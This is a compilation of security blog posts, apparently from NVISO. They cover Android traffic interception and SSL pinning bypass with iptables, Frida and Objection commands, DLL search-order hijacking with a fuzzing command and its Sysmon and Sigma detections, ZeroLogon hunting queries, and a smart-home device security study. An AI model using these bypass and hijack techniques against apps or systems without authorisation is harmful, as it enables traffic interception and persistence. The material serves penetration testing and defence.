Many applications simply ignore the proxy settings of the system. Applications that use standard libraries will typically use the system proxy settings, but applications that rely on interpreted language (such as Xamarin and Unity) or are compiled natively (such as Flutter) usually require the developer to explicitly program proxy support into the application.

Sanity check
When running the application, you should either see your HTTPS data in Burp’s Proxy tab, or you should see HTTPS connection errors in Burp’s Event log on the Dashboard panel. Since the entire device is proxied, you will see many blocked requests from applications that use SSL Pinning (e.g. Google Play), so see if you can find a domain that is related to the application. If you don’t see any relevant failed connections, your application is most likely proxy unaware.

As an additional sanity check, you can see if the application uses a third party framework. If the app is written in Flutter it will definitely be proxy unaware, while if it’s written in Xamarin or Unity, there’s a good chance it will ignore the system’s proxy settings.

  • Decompile with apktool
    • apktool d myapp.apk
  • Go through known locations
    • Flutter: myapp/lib/arm64-v8a/libflutter.so
    • Xamarin: myapp/unknown/assemblies/Mono.Android.dll
    • Unity: myapp/lib/arm64-v8a/libunity.so

Solution
There are a few things to try:

  • Use ProxyDroid (root only). Although it’s an old app, it still works really well. ProxyDroid uses iptables in order to forcefully redirect traffic to your proxy
  • Set up a custom hotspot through a second wireless interface and use iptables to redirect traffic yourself. You can find the setup on the mitmproxy documentation, which is another useful HTTP proxy. The exact same setup works with Burp.

In both cases, you have moved from a ‘proxy aware’ to a ‘transparent proxy’ setup. There are two things you must do:

  • Disable the proxy on your device. If you don’t do this, Burp will receive both proxied and transparent requests, which are not compatible with each other.
  • Configure Burp to support transparent proxying via Proxy > Options > active proxy > edit > Request Handling > Support invisible proxying

Perform the sanity check again to now hopefully see SSL errors in Burp’s event log.

Is the application using custom ports?

This only really applies if your application is not proxy aware. In that case, you (or ProxyDroid) will be using iptables to intercept traffic, but these iptables rules only target specific ports. In the ProxyDroid source code, you can see that only ports 80 (HTTP) and 443 (HTTPS) are targeted. If the application uses a non-standard port (for example 8443 or 8080), it won’t be intercepted.

Sanity check
This one is a bit more tricky. We need to find traffic that is leaving the application that isn’t going to ports 80 or 443. The best way to do this is to listen for all traffic leaving the application. We can do this using tcpdump on the device, or on the host machine in case you are working with a second Wi-Fi hotspot.

Run the following command on an adb shell with root privileges:

tcpdump -i wlan0 -n -s0 -v

You will see many different connections. Ideally, you should start the command, open the app and stop tcpdump as soon as you know the application has made some requests. After some time, you will see connections to a remote host with a non-default port. In the example below, there are multiple connections to 192.168.2.70 on port 8088:

Alternatively, you can send the output of tcpdump to a pcap by using tcpdump -i wlan0 -n -s0 -w /sdcard/output.pcap. After retrieving the output.pcap file from the device, it can be opened with WireShark and inspected:

Solution

If your application is indeed proxy unaware and communicating over custom ports, ProxyDroid won’t be able to help you. ProxyDroid doesn’t allow you to add custom ports, though it is an open-source project and a PR for this would be great 😉. This means you’ll have to use iptables manually.

  • Either you set up a second hotspot where your host machine acts as the router, and you can thus perform a MitM
  • Or you use ARP spoofing to perform an active MitM between the router and the device
  • Or you can use iptables yourself and forward all the traffic to Burp. Since Burp is listening on a separate host, the nicest solution is to use adb reverse to map a port on the device to your Burp instance. This way you don’t need to set up a separate hotspot, you just need to connect your device over USB.
    • On host: adb reverse tcp:8080 tcp:8080
    • On device, as root: iptables -t nat -A OUTPUT -p tcp -m tcp --dport 8088 -j REDIRECT --to-ports 8080

Is the application using SSL pinning?

At this point, you should be getting HTTPS connection failures in Burp’s Event log dashboard. The next step is to verify if SSL pinning is used, and disable it. Although many Frida scripts claim to be universal root bypasses, there isn’t a single one that even comes close. Android applications can be written in many different technologies, and only a few of those technologies are typically supported. Below you can find various ways in which SSL pinning may be implemented, and ways to get around it.

Note that some applications have multiple ways to pin a specific domain, and you may have to combine scripts in order to disable all of the SSL pinning.

Pinning through android:networkSecurityConfig

Android allows applications to perform SSL pinning by using the network_security_config.xml file. This file is referenced in the AndroidManifext.xml and is located in res/xml/. The name is usually network_security_config.xml but it doesn’t have to be. As an example application, the Microsoft Authenticator app has the following two pins defined:

Solution
Use any of the normal universal bypass scripts:

  • Run Objection and execute the android sslpinning disable command
  • Use Frida codeshare: frida -U --codeshare akabe1/frida-multiple-unpinning -f be.nviso.app
  • Remove the networkSecurityConfig setting in the AndroidManifest by using apktool d and apktool b. Usually much faster to do it through Frida and only rarely needed.

Pinning through OkHttp

Another popular way of pinning domains is through the OkHttp library. You can do a quick validation by grepping for OkHttp and/or sha256. You will most likely find references (or even hashes) relating to OkHttp and whatever is being pinned:

Solution
Use any of the normal universal bypass scripts:

  • Run Objection and execute the android sslpinning disable command
  • Use Frida codeshare: frida -U --codeshare akabe1/frida-multiple-unpinning -f be.nviso.app
  • Decompile the apk using apktool, and modify the pinned domains. By default, OkHttp will allow connections that are not specifically pinned. So if you can find and modify the domain name that is pinned, the pinning will be disabled. Using Frida is much faster though, so this approach is rarely taken.

Pinning through OkHttp in obfuscated apps

Universal pinning scripts may work on obfuscated applications since they hook on Android libraries which can’t be obfuscated. However, if an application is using something else than a default Android Library, the classes will be obfuscated and the scripts will fail to find the correct classes. A good example of this is OkHttp. When an application is using OkHttp and has been obfuscated, you’ll have to figure out the obfuscated name of the CertificatePinner.Builder class. You can see below that obfuscated OkHttp was used by searching on the same sha256 string. This time, you won’t see nice OkHttp class references, but you will typically still find string references and maybe some package names as well. This depends on the level of obfuscation of course.

Solution
You’ll have to write your own Frida script to hook the obfuscated version of the CertificatePinner.Builder class. I have written down the steps to easily find the correct method, and create a custom Frida script in this blogpost.

Pinning through various libraries

Instead of using the networkSecurityConfig or OkHttp, developers can also perform SSL pinning using many different standard Java classes or imported libraries. Additionally, some Java based third party app such as the PhoneGap or AppCelerator frameworks provide specific functions to the developer to add pinning to the application.

There are many ways to do it programmatically, so your best bet is to just try various anti-pinning scripts and at least figure out what kind of methods are being triggered so that you have information on the app, after which you may be able to further reverse-engineer the app to figure out why interception isn’t working yet.

Solution
Try as many SSL pinning scripts you can find, and monitor their output. If you can identify certain classes or frameworks that are used, this will help you in creating your own custom SSL pinning bypasses specific for the application.

Pinning in third party app frameworks

Third party app frameworks will have their own low-level implementation for TLS and HTTP and default pinning bypass scripts won’t work. If the app is written in Flutter, Xamarin or Unity, you’ll need to do some manual reverse engineering.

Figuring out if a third party app framework is used
As mentioned in a previous step, the following files are giveaways for either Flutter, Xamarin or Unity:

  • Flutter: myapp/lib/arm64-v8a/libflutter.so
  • Xamarin: myapp/unknown/assemblies/Mono.Android.dll
  • Unity: myapp/lib/arm64-v8a/libunity.so

Pinning in Flutter applications

Flutter is proxy-unaware and doesn’t use the system’s CA store. Every Flutter app contains a full copy of trusted CAs which is used to validate connections. So while it most likely isn’t performing SSL pinning, it still won’t trust the root CA’s on your device and thus interception will not be possible. More information is available in the blogposts mentioned below.

Solution
Follow my blog post for either ARMv7 (x86) or ARMv64 (x64)

Pinning in Xamarin and Unity applications

Xamarin/Unity applications usually aren’t too difficult, but they do require manual reverse engineering and patching. Xamarin/Unity applications contain .dll files in the assemblies/ folder and these can be opened using .NET decompilers. My favorite tool is DNSpy which also allows you to modify the dll files.

Solution
No blog post on this yet, sorry 😉. The steps are as follows:

  • Extract apk using apktool and locate .dll files
  • Open .dll files using DNSpy and locate HTTP pinning logic
  • Modify logic either by modifying the C# code or the IL
  • Save the modified module
  • Overwrite the .dll file with the modified version
  • Repackage and resign the application
  • Reinstall the application and run

What if you still can’t intercept traffic?

It’s definitely possible that after all of these steps, you still won’t be able to intercept all the traffic. The typical culprits:

  • Non-HTTP protocols (we’re only using an HTTP proxy, so non-HTTP protocols won’t be intercepted)
  • Very heavy obfuscation
  • Anti-tampering controls

You will usually see these features in either mobile games or financial applications. At this point, you’ll have to reverse engineer the application and write your own Frida scripts. This can be an incredibly difficult and time consuming process, and a step-by-step guide such as this will never be able to help you there. But that, of course, is where the fun begins 😎.

About the author

AAEAAQAAAAAAAAYHAAAAJGUzZmUxMmVmLWY3M2MtNDRmNy05YzZlLWMxZTk1ZTE5MWYzMQ


Jeroen Beckers is a mobile security expert working in the NVISO Cyber Resilience team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff. You can find Jeroen on LinkedIn.

NVISO and QuoIntelligence Announce Strategic Cooperation

30 October 2020 at 10:51

We are pleased to announce that we have created a unique approach with QuoIntelligence GmbH in responding to the TIBER-EU testing. Using our approach, we combine both passive threat intelligence gathering and active offensive red team testing as one seamless experience while remaining independent from each other.  

The TIBER-EU Framework, More Critical Now Than Ever 

The constant evolution of the cyber threat landscape combined with the recent acceleration of the financial sector’s digital transformation, led by new global challenges such as the COVID-19 pandemic, brings new complex cyber threats using more advanced methods and techniques. Financial institutions can better face these evolving threats and aim to reach a more secure digital environment by putting in place the right cyber and operational resilience strategies early on. 

In order to test and improve the cyber resilience of financial institutions, the European Central Bank developed a framework for ‘Threat Intelligence Based Ethical Red Teaming’, commonly known as TIBER-EU framework, to carry out a controlled cyberattack based on real-life threat scenarios. TIBER-EU exercises are designed for entities which are part of the core financial infrastructure at the national or European level.

“It is the first EU-wide guide on how authorities, entities, threat intelligence and red-team providers should work together to test and improve the cyber resilience of entities by carrying out a controlled cyberattack.”  – Fiona van Echelpoel, Deputy Director General at ECB 

By conducting a TIBER-EU test, institutions can enhance their cyber and operational resilience and operational resilience by focusing on technology, monitoring and human awareness strengths & weaknesses before they are exploited by real-life threat actors. The exercise’s main objective is to test and improve protection, detection, and response capabilities against sophisticated cyber threats. Having a TIBER-EU test implemented, European organizations will then be able to reduce the impact of potential cyberattacks.

Source: Lessons Learned and Evolving Practices of the TIBER Framework

Benefits for European Organizations 

Since the TIBER-EU testing process can be quite overwhelming for the testing entities, selecting the right qualified providers is the first step towards a successful experience and resourceful outcome. The combined work and fluent integrations and communications between the Threat Intelligence and Red Teaming providers is crucial to implement optimal strategies tailored to the testing entity’s cyber strength and weaknesses. 

For this reason, we at NVISO are cooperating with QuoIntelligence GmbH, a German Threat Intelligence provider supporting decision-makers with customized and actionable intelligence reports,, to facilitate the cyber resilience testing process. Within this approach, QuoIntelligence first looks at the range of possible threats, selects the most applicable threat actors likely to target the entity, and creates a customized Targeted Threat Intelligence Report which lays the foundation for the Red Teaming’s attack scenarios. Then, NVISO, as the Red Teaming provider, carries out the simulated attack and attempts to compromise the critical functions of the entity by mimicking one of the real-life threat actors in scope.

In cooperation with QuoIntelligence, we already implemented effective joint processes and offer a seamless experience between the Threat Intelligence and Red Teaming providers. Organizations can then take the worry out of the process and be led by experienced providers. 

Conclusion

Cybersecurity risks are becoming harder to assess and interpret due to the growing complexity of the threat landscape, adversarial ecosystem, and expansion of the attack surface.

“The expansion of knowledge and expertise in cybersecurity is crucial to improve preparedness and resilience. The EU should continue building capacity through the investment in cybersecurity training programs, professional certification, exercises and awareness campaigns.”  – ENISA Threat Landscape Report 2020 

In order to test and improve the cyber resilience of the European financial sector, the European Central Bank has put in place the TIBER-EU framework involving a close collaboration between a Threat Intelligence provider and a Red Teaming provider.

QuoIntelligence and NVISO are now offering a strategic approach to simplify the TIBER-EU testing process and offer a worry-free experience to European organizations that want to take their cyber and operational resilience to the next level.

Authors and contact

In case of questions and for more information, please contact [email protected].

This article was written by Marina Hirschberger, Senior Security Consultant, in accordance with Jonas Bauters, Solution Lead for Red Teaming at NVISO and in cooperation with Iris Fernandez , Marketing Expert at QuoIntelligence GmbH.

MITRE ATT&CK turned purple – Part 1: Hijack execution flow

6 October 2020 at 10:42
By: NVISO

The MITRE ATT&CK framework is probably the most well-known framework in terms of adversary emulation and by extent, red teaming.
It features numerous TTPs (Tactics, Techniques, and Procedures) and maps them to threat actors. Being familiar with this framework is not only benefiting the red team operations but the blue team operations as well! To create the most secure environment for your enterprise, it is imperative that you know what threat actors are using and how to defend against it.

Having a 100% coverage of MITRE ATT&CK is probably not feasible, by choosing which TTPs are most relevant for your environment however, you can start setting up baseline defenses and expand from there. This will help you mature your enterprise’s security posture significantly. We at NVISO are using the framework in our daily operations and have therefore decided it was time to combine the knowledge we have in-house from both our blue and red teams to provide insight into how these techniques can be leveraged from an offensive point of view AND how to prevent (or at least detect) the technique from a defensive point of view. In our first blogpost of the series, we decided to cover T1574 – Hijack execution flow.

Offensive point of view: Leveraging execution flow hijacking in red team engagements and threat emulations

Execution flow hijacking usually boils down to the following: identifying a binary present on the system that is missing dependencies (typically a DLL) and providing said missing dependency. Luckily for us, the good people at Microsoft have gifted us with a tool suite called sysinternals, which we will happily leverage to identify missing dependencies.

It should be noted that casually dropping sysinternals tools on a target environment is very poor operational security and probably won’t do you much good anyway. For most of the tooling (if not all), you will need to have administrative privilege on the machine you are running it from. Therefore it is much more interesting to either have some “educated” knowledge beforehand on what tools are living on your targeted environment. Alternatively (and simpler), you can hijack a program you know will most likely be installed. Some fine examples of this would be Teams, Chrome, Firefox, …

We can identify missing dependencies using a tool that was created by our friends over at SpectreOps called “DLLHijackTest”. This tool needs an extract from sysinternals’ Process Monitor and will attempt to verify if the processes identified are indeed hijackable, as not all missing DLLs are getting loaded in the same way (calling DLLMain) at execution time.

Let’s identify some nice missing dependencies on our trusted Internet Explorer using the following Process Monitor filter:

After this filter is applied, let’s open Internet Explorer and check our process monitor light up like a Christmas tree:

Now we can export this as a CSV file by going to file -> save and choosing CSV as an output format.

Everything we need now is a valid hijack, which we can test using the aforementioned PowerShell script from SpectreOps:

Get-PotentialDLLHijack -CSVPath "G:\testzone\DLLHijackTest-master\InternetExplorer\IE.CSV" -MaliciousDLLPath "G:\testzone\DLLHijackTest-master\x64\Release\DLLHijackTest.dll" -ProcessPath "C:\Program Files\Internet Explorer\iexplore.exe"

What happens now is the following chain of steps:

  • A DLL gets dropped in the location of the application and is named after a missing dependency
  • The process gets launched
  • If the DLLMain method is called, the DLL will write its own path into an arbitrary location that you need to replace in the source code of the SpectreOps project.
  • The process terminates

This repeats until the entire CSV is parsed. If the application has a vulnerable Hijack, an output file will be created at the location you hardcoded.

In the case of Internet Explorer this is indeed the case:

We have successfully fuzzed Internet Explorer and identified four missing DLLs that are in fact loaded and their DLLMain is executed.

Note: for this blogpost, IE was chosen as a PoC. You will need admin rights to write in C:\Program Files\ so for red team ops, this is a pretty weak candidate, unless you will abuse this for persistence reasons.

Now all that is left to do is create a DLL that executes your payload, name it one of the missing dependencies identified in the results file and drop it on disk.
Every time Internet Explorer will be opened, your DLL payload will fire.

Defensive point of view: Preventing and detecting execution flow Hijacks

When looking through the public Sigma repository, it is noticeable how only a few rules to detect this technique exist:
Some 20 exist, of which two are authored by NVISO: Maxime Thiebaut’s “Windows Registry Persistence COM Search Order Hijacking”, and Bart Parys and yours truly’s “Fax Service DLL Search Order Hijack”. All of these only cover specific instances of this technique. The reason for this is very simply that it is next to impossible to write a rule that covers the many options the red team/adversary has to exploit this technique. Proper detection is achievable however, by getting a baseline of your environment and alerting on any DLLs/EXEs loaded from unexpected locations.

While Sysmon can be configured to log ImageLoaded events as event ID 7, this is disabled by default because of the massive amount of logs it would generate.
To help with triaging you can use a PowerShell script to semi-automatically generate a Sysmon config that excludes all known-good DLLs that are loaded.
See the example below for one such (basic) PowerShell script:

# Run this script repeatedly to automatically add the newly used DLLs to the exclusions.
# Do a reboot after installing the "base" Sysmon config to log all the DLLs loaded in the Windows boot process.

# Modify to point to the Sysmon executable.
$SYSMON_EXECUTABLE = "C:\Sysmon\Sysmon64.exe"
# Modify to point to the new config. (Will be overwritten by a run of the script!)
$CONFIG_FILE = "C:\Sysmon\config.xml"

Function Get-DLLs {
    # Using a HashSet to avoid having to filter for duplicates
	$dlls = New-Object System.Collections.Generic.HashSet[String]
	
    try {
        # Retrieve all Sysmon ImageLoaded events
	    $events = Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "Event[System[(EventID=7)]]"
        # Extract the ImageLoaded from the events' Message fields
		$events.Message | ForEach-Object -Process {
			$loaded = (Select-String -InputObject $_ -Pattern "ImageLoaded: (.*)").Matches.Groups[1]
			$dlls.add($loaded) | Out-Null
		}
	} catch {}
	
    # Sort before returning for consistent & managable output
	$dlls | Sort-Object
}

Function Export-SysmonConfig {
	Param($dlls)
	
	$XMLHeader = @"
<Sysmon schemaversion=`"4.22`">
    <EventFiltering>
        <RuleGroup name="" groupRelation=`"or`">
            <ImageLoad onmatch=`"exclude`">

"@
	$XMLTrailer = @"
            </ImageLoad>
        </RuleGroup>
    </EventFiltering>
</Sysmon>
"@
    # To indent <ImageLoaded> for readability.
    $Offset = "                "
	
	Function Format-Exclusion {
		Param($dll)
		$dll = $dll.trim()
		$Offset + "<ImageLoaded condition=`"is`">$dll</ImageLoaded>`n"
	}
		
	$XMLConfig = $XMLHeader
	$XMLConfig += $Offset + "<ImageLoaded condition=`"is`">$SYSMON_EXECUTABLE</ImageLoaded>`n"
	$XMLConfig += $Offset + "<ImageLoaded condition=`"begin with`">C:\Windows\System32\</ImageLoaded>`n"
	$XMLConfig += $Offset + "<ImageLoaded condition=`"begin with`">C:\Windows\SysWOW64\</ImageLoaded>`n"
	foreach ($dll in $dlls) {
		$XMLConfig += Format-Exclusion $dll
	}
	$XMLConfig += $XMLTrailer
	
	$XMLConfig
}

$dlls = Get-DLLs
Export-SysmonConfig $dlls | Tee-Object -FilePath $CONFIG_FILE
# Install the new config to lower the amount of logs generated.
Start-Process -FilePath $SYSMON_EXECUTABLE -ArgumentList @('-c', $CONFIG_FILE)

Be sure to only execute this on a known-good device, such as a freshly imaged laptop or a new VM:
If you use a potentially compromised device to generate this, there is a chance of excluding a malicious DLL that can then remain completely undetected in your environment.
You will need to run this every time a piece of software gets updated, as the loaded DLLs may change (new DLLs added, older DLLs no longer relevant) depending on the version of the software.

Note that to limit the amount of exclusions the config needs, the C:\Windows\System32\ and C:\Windows\SysWOW64\ directories are excluded in their entirety by the script.
You should set up a SIEM alert for Sysmon event ID 11 (FileCreate) if the TargetFileName starts with either of these directories.
A Sigma rule to detect this looks as follows:

title: DLL Created In Windows System Folder
id: ddc5624d-4127-4787-8cd9-e0943ebb10e8
status: experimental
description: |
  Detects new DLLs written to the Windows system folders.
  Can be used to gain persistence on a system by exploiting DLL hijacking vulnerabilities.
references: 
  - https://blog.nviso.eu/2020/10/06/mitre-attack-turned-purple-part-1-hijack-execution-flow
tags:
  - attack.t1574.001
  - attack.t1574.002
author: NVISO
date: 2020/10/05
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 11
    TargetFilename|startswith:
      - 'C:\Windows\System32\'
      - 'C:\Windows\SysWOW64\'
    TargetFilename|endswith: '.dll'
  condition: selection
falsepositives:
  - Driver installations
  - Some other software installations 
level: high

If your configuration is correct, you should not generate any Sysmon event ID 7 for legitimate DLLs and you can simply alert on any occurrence of the event as potentially malicious.
Any DLLs dropped in the excluded directories get flagged by the Sigma rule for proper coverage.
Even if your Sysmon config is not covering 100% of the legitimately loaded DLLs, the volume of generated events should be low enough to be able to be workable, and additional filtering can also be done using a SIEM or automated in a SOAR solution, for example.
With sufficient time, your detection capabilities for this technique should be tuned finely enough as to not generate many false positives.

Detection for this technique is obviously not cut-and-dry but it is possible to have very good coverage, provided your blue team gets a proper testing environment to improve their detection capabilities.

Prevention of this technique works very similar to detection:
One can write AppLocker policies to only allow known DLLs to load.
You can create a list of loaded DLLs by setting the policy to audit for several weeks and appending DLLs that were missed by the initial testing to the list of known-good ones before enforcing your policies.

The script and rule in this blogpost are available on our GitHub.

Conclusion

We hope that this blogpost has provided you with actionable information and has given you more insight into leveraging this technique and defending against it.
This was the first blogpost of a recurring series, we hope to see you again when we cover another ATT&CK technique in the near future!
From all of us at NVISO, stay safe!

About the author(s)

  • Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. When he is not working, you can probably find Jean-François in the Gym or conducting research. Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
    He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
    You can find Jean-François on LinkedIn and on Hack The Box.
  • Remco Hofman is an intrusion analyst in NVISO’s MDR team, always looking at improving the detection capabilities of the service. A few cups of properly brewed tea help him unwind after a long day’s work.
    You can find him on Twitter or LinkedIn.

Sentinel Query: Detect ZeroLogon (CVE-2020-1472)

17 September 2020 at 09:56

In August 2020 Microsoft patched the ZeroLogon vulnerability CVE-2020-1472. In summary, this vulnerability would allow an attacker with a foothold in your network to become a domain admin in a few clicks. The attacker only needs to establish a network connection towards the domain controller.

At NVISO we are supporting multiple clients with our MDR services, from that perspective our security experts analyzed the vulnerability and made queries for both Sentinel and threat hunting ( “Advanced Hunting”) to detect these types of activities in your network.

One requirement for running Sentinel queries is of course that you have on-boarded Active Directory event logs in your Sentinel log analytics workspace. This can be done by installing the Microsoft Monitoring Agent and forwarding the events towards said workspace.

In case these logs are available you can use the query below to detect activities related to the ZeroLogon vulnerability. Within this query, you have to replace DC1$ and DC2$ with the hostname(s) of your Domain Controllers.

//Search for anonymous logons, note this may produce FPs
SecurityEvent
| extend EvData = parse_xml(EventData)
| extend EventDetail = EvData.EventData.Data
| extend TargetUserName_CS = EventDetail.[1].["#text"], SubjectUserSid_CS = EventDetail.[4].["#text"], SubjectUserName_CS = EventDetail.[5].["#text"]
| project-away EvData, EventDetail
| where ((EventID == 4742)
    and (TargetUserName_CS in~ ("DC1$", "DC2$"))
     and ((SubjectUserName_CS contains "anonymous") or (SubjectUserSid_CS startswith "S-1-0") or (SubjectUserSid_CS startswith "S-1-5-7")))

The following image shows an example output of this query:

Should Sentinel not be available or the workspace has not been set up, we also include a KQL query (KUSTO rule) to be used in Advanced Hunting:

//Search for anonymous logons, note this may produce FPs
union DeviceLogonEvents, DeviceProcessEvents
| where AccountName in~ ("anonymous") or InitiatingProcessAccountName in~ ("anonymous") or
AccountSid startswith "S-1-0" or InitiatingProcessAccountSid startswith "S-1-0" or
AccountSid startswith "S-1-5-7" or InitiatingProcessAccountSid startswith "S-1-5-7"
//Remove FP
| where InitiatingProcessFileName != "ntoskrnl.exe"
| summarize by Timestamp, DeviceId, ReportId, DeviceName, AccountName, InitiatingProcessAccountName, AccountSid,
InitiatingProcessAccountSid, AccountDomain, InitiatingProcessFileName, ProcessCommandLine, AdditionalFields

Note that Anonymous Logons should be investigated either way. While this may be a False Positive such as the host itself, an Administrator or a Service account – it can also indicate malicious behavior. Use the Sentinel query below to investigate further.

//Once a detection from previous rule has hit, use the following to validate - if there IS a logon, investigate further. If not, it's likely a False Positive
SecurityEvent 
| where ((EventID == 4624) and (TargetUserName =~ "DC1$"))
| distinct SubjectUserName

One way of investigating further whether this is a False Positive or not, is to leverage the Netlogon log, and correlating or comparing the output with results from running the queries above. This log is by default disabled, but can be enabled as follows on the affected Domain Controller (DC):  

  1. Execute the following commands in an elevated prompt:
    • Nltest /DBFlag:2080FFFF
    • net stop netlogon
    • net start netlogon
  2. The same can be achieved with (elevated) PowerShell:
    • Nltest /DBFlag:2080FFFF
    • Restart-Service Netlogon
  3. Investigate the log file that will be created. Note it may take a while to reproduce the event. The log file is found at: %windir%\debug\netlogon.log
  4. Correlate the event(s) from before in the Netlogon log. Once identified, you can disable Netlogon logging again by setting the DBFlag as 0x0.

The following query will assist in detecting whenever a vulnerable Netlogon secure channel connection is allowed – keep in mind however this will only work should you have already applied the patch:

//This query will work ONLY after the patch has been applied. It warrants further investigation.
Event
| where EventID == 5829

On top of this we also wrote an additional KQL query to search for evidence – specifically, if someone has (intentionally or not) disabled Enforcement Mode.

//Netlogon enforcement explicitly disabled
union DeviceProcessEvents, DeviceRegistryEvents
| where RegistryKey contains "\\system\\currentcontrolset\\services\\netlogon\\parameters"
| where RegistryValueName == "FullSecureChannelProtection"
| where RegistryValueType == "Dword"
| where RegistryValueData == 0 or RegistryValueData == 0x00000000
| summarize by Timestamp, DeviceId, ReportId, DeviceName, RegistryKey, InitiatingProcessAccountName, InitiatingProcessFileName, ProcessCommandLine

Note that the KUSTO hunting queries can also be leveraged as a Detection Rule, which allows for proactive alerting.

In case you want additional details about the queries or Sentinel please do not hesitate to reach out! You can contact the blog authors or via filling in the contact form on our website https://www.nviso.eu.

References

Our research is based upon the following references

Authors

This blog post was created based on the collaborative effort of :

Smart Home Devices: assets or liabilities? – Part 1: Security

14 September 2020 at 11:12

This blog post is part of a series, keep an eye out for the following parts!

TL;DR – Smart home devices are everywhere, so I tested the base security measures implemented on fifteen devices on the European market. In this blog post, I share my experience throughout these assessments and my conclusions on the overall state of security of this fairly new industry. Spoiler alert: there’s a long road ahead of this industry to grow in maturity when it comes to security.

Great new toys, great new responsibilities

Increasingly often, we are surrounding ourselves with connected devices. Even those who are adamant about not having any “smart devices” in their homes usually happily switch on their smart TV at the end of a long day while they drop down on the sofa. According to market studies and economic forecasts, the market share of smart home devices has been steadily rising for quite some time now, and that is not expected to be changing anytime soon. Smart home environments are everywhere these days, and for the most part they make our lives a lot more convenient.

However, there is another side to the coin: just like the devices themselves, news coverage about security concerns surrounding these devices has been popping up weekly, if not daily. Crafty criminals are tricking smart voice assistants into opening garage doors, circumventing ‘smart’ alarms or might even be spying on people through their internet-connected camera. We’ve already taken a deep dive in the past into some smart alarms, which showed their security left a lot to be desired. This raises the question: how secure are these devices we introduce to our daily lives really? I’ve tried to find out exactly that.

File:HAL9000 I'm Sorry Dave Motivational Poster.jpg - Wikimedia Commons
The words none of us want to hear when we ask our smart assistant to unlock the front door.
(Image credit: Wikimedia Foundation)

Research methodology

To get an idea of the overall security of Smart Home devices on the European market, I selected fifteen devices, chosen in such a way that they represented as many different product categories, price ranges and brands as possible. Where possible, I made sure to get at least two devices of different price ranges and brands in each category to be able to compare them.

Devices of all kinds were chosen for the tests.
(Image credit: see “Reference” below)

Then, I subjected each device to a broad security assessment. Each assessment consisted of a series of tests that were based on ENISA’s “Baseline Security Recommendations for IoT”. Here, the goal was not to conduct a full in-depth assessment of each device, but to get an overview on whether each device implemented the baseline of security measures a customer could reasonably expect from an off-the-shelf smart home solution. In order to guarantee repeatability of the tests, I mostly relied on automated industry-standard testing tools, such as nmap, Wireshark, Burp Suite, and Nessus.

In my tests, I covered the following range of categories: Network Communications, Web Interfaces, Operating Systems & Services, and Mobile Applications.

Network Communications

Because (wireless) network communications make up a large part of the attack surface of Smart Home devices, I performed a network capture of the traffic of each device for an idle period of 24 hours.

Without even looking into the data itself, it’s already interesting to note the vast differences in the number of captured packets within this period, where smart voice assistants and cameras are the clear winners.

Why does a doorbell send that many packets?
(Image credit: see “Reference” below)

In the figure below, you can see the different protocols that these devices used.

Oh, and all of the devices used DNS of course!
(Image credit: see “Reference” below)

When we think about network security, the encryption of the data is the most obvious security control we can check. However, this proved to be not always easy: Wireshark will tell you if TLS is being used or not, but aside from that, how can we determine if a raw TCP or UDP data stream is encrypted or not? For this, I used two scripts written by my colleague, Didier Stevens: simple_tcp_stats and simple_udp_stats.

These scripts calculate the average Shannon Entropy in each data stream. Streams with a high entropy value are likely encrypted, whereas streams with a low entropy value will likely contain natural text or structured data. The results were surprising: when mapping the different entropy scores in some box plots, many devices had multiple data streams with low entropy values, indicating that data was likely not being encrypted.

  • Lower score means data is less likely to be encrypted.
  • Keep in mind (unencrypted) DNS was included in these graphs.
Anybody order some entropy boxplots?
(Image credit: see “Reference” below)

The above results indicate that while yes, some devices used state of the art, standardised, and most importantly secure network protocols, about half of them used something that was either not recognised by Wireshark (e.g. raw TLS/UDP streams) or has been proven to be insecure in the past (e.g. TLS 1.0). The results of the entropy testing are striking: not a single device wasn’t guilty of sending some data that was likely not encrypted: even those devices that encrypted the majority of their communications still sent DNS or sometimes NTP requests unencrypted over the network.

Web Interfaces

A lot of devices need some type of interface to interact with them. In most cases, that’s the mobile application accompanying the device. Sometimes, devices also support interactions via a web interface. Then, there are two options: a local interface, directly running on the device, or a cloud interface that runs on online servers maintained by the manufacturer. In the case of the latter, which made up most of the devices, doing in-depth testing was simply not possible due to legal limitations. However, one thing I could do was scan the cloud interface for SSL/TLS vulnerabilities with Qualys SSL Labs. I tested local interfaces by running an active scan in Burp Professional and performing a nikto scan.

On local interfaces, the most common serious flaw I found was the lack of encrypted communications: all of them ran over HTTP and sent credentials (as well as all other information, such as configuration data) in plaintext over the network. Quite a serious violation of secure web development practices for a really long time now.

Cloud interfaces were accessible via HTTPS, and all of them scored a B on the SSL Labs test because they all supported old TLS versions 1.0 and/or 1.1. While a B is not an inherently bad score, this indicates many vendors prioritise compatibility over security, as a higher score would be expected of those that want to deliver the best security to their customers.

All in all, it seems like developers adhered to the regular best practices when it came to cloud portals, but somehow forgot that local web interfaces also need the same care and protection as any other exposed service would have. It’s not because a device isn’t directly open for connections over the internet, that an attacker who gained access to the local network won’t try to gain a larger foothold by connecting to the devices within it.

Operating System & Services

I port scanned each device with nmap and ran some basic service discovery and vulnerability scans with Nessus Essentials. Sadly, I found that traditional scanning methods translate very poorly to these smart home devices: service discovery was very unreliable at best and plain wrong in most cases. Vulnerability scanning rarely yielded any interesting results besides some basic informational alerts. This is likely caused by the large amount of proprietary technologies or custom protocols that are being used by these devices.

What this concretely means is that there’s no straightforward, easy way to get an insight in the security of the devices. Gaining such knowledge would require tailored, targeted security assessments: a time consuming and difficult task, even for highly skilled professionals. Pretty discomforting, if you ask me.

Mobile Applications

As I mentioned earlier, users can often interact with their devices via web interfaces or a smartphone app. I performed static analysis on each of the corresponding android apps with MobSF (Mobile Security Framework). More specifically, I looked at:

  • the permissions requested by each app;
  • the known trackers embedded in the code;
  • domains that could be found in the code to get an indication of which and how many servers the app was calling out to.

I found that a lot of applications were asking for a disproportionally large number of permissions, sometimes even permissions an application arguably would not need to function properly. For example, what use does a smart light bulb app have for requesting permissions to record audio?

‘Dangerous’ permissions are any permissions the user needs to explicitly allow access for.
(Image credit: see “Reference” below)

